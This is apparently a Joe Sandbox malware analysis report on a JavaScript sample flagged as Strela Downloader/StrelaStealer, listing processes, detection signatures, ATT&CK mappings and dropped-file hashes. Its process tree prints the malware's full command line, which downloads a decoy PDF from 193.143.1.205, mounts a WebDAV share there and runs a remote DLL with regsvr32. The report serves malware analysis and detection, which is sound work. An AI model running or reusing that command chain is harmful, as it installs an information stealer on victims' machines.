Windows
Analysis Report
871073659923481.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 5644 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\87107 3659923481 .js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6192 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\122 9416913445 5.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5676 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6204 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1264 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 3652 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 48 --field -trial-han dle=1660,i ,151218015 7199682666 0,83640434 3026918174 7,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3656 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
10% | Virustotal | Browse | ||
8% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589083 |
Start date and time: | 2025-01-11 09:19:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 871073659923481.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/60@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 34.237.241.83, 50.16.47.176, 54.224.241.105, 18.213.11.84, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 2.16.168.105, 2.16.168.107, 23.55.235.177, 23.54.161.98, 192.168.2.5, 13.107.246.45, 20.109.210.53, 23.47.168.24
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
03:20:10 | API Interceptor | |
03:20:14 | API Interceptor | |
03:20:14 | API Interceptor | |
03:20:27 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8307259061049456 |
Encrypted: | false |
SSDEEP: | 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug9:gJjJGtpTq2yv1AuNZRY3diu8iBVqFz |
MD5: | 502C2D2B48614AECDCE5A2264B49B282 |
SHA1: | CF00C73EB1C187623922E46F78CCDD41ECF94102 |
SHA-256: | C3E80F186D6F68ECD9E873ACCE417F5BA802D9A0409C43B9620700A4A0B207A4 |
SHA-512: | D7159EA1FBE9FFCFA961751879B53FE47316F9A20E50D5F50F75D01812CD4D19563AF3ACA510F549EB7EE24B6FE24389A829F76E8D73FCC77EF14F99780AEDEE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.6586142440245373 |
Encrypted: | false |
SSDEEP: | 1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h |
MD5: | 02F644238ED1E284ADCE7F98F1EBD9CD |
SHA1: | EDC4CA3A08FE82927184ED952B49938DD862400F |
SHA-256: | 87106C3E1AADE33542220B909A88EAA961F6F31171BDC468A7AA16180397CE6C |
SHA-512: | 2B0A72878942202E2FBF23590031F50D2CB841C43B060BBDC78B2562406FB5D6C3DBC217532146F29EECA4909EF9963B84C3455F1540B71F6ED217586C840E15 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08086216819819572 |
Encrypted: | false |
SSDEEP: | 3:8y8Yec5jekGuAJkhvekl1D46a+llrekGltll/SPj:8y8zGjtrxlsaJe3l |
MD5: | 26941D184775C8678A63EB02D1D70A57 |
SHA1: | 864B6AFF5DA89C17E1D1708A79708CAE93E696FA |
SHA-256: | 971C0AFC4FD69120E13BF14F284D40BA96907F2DC819E830200F73517A126CF6 |
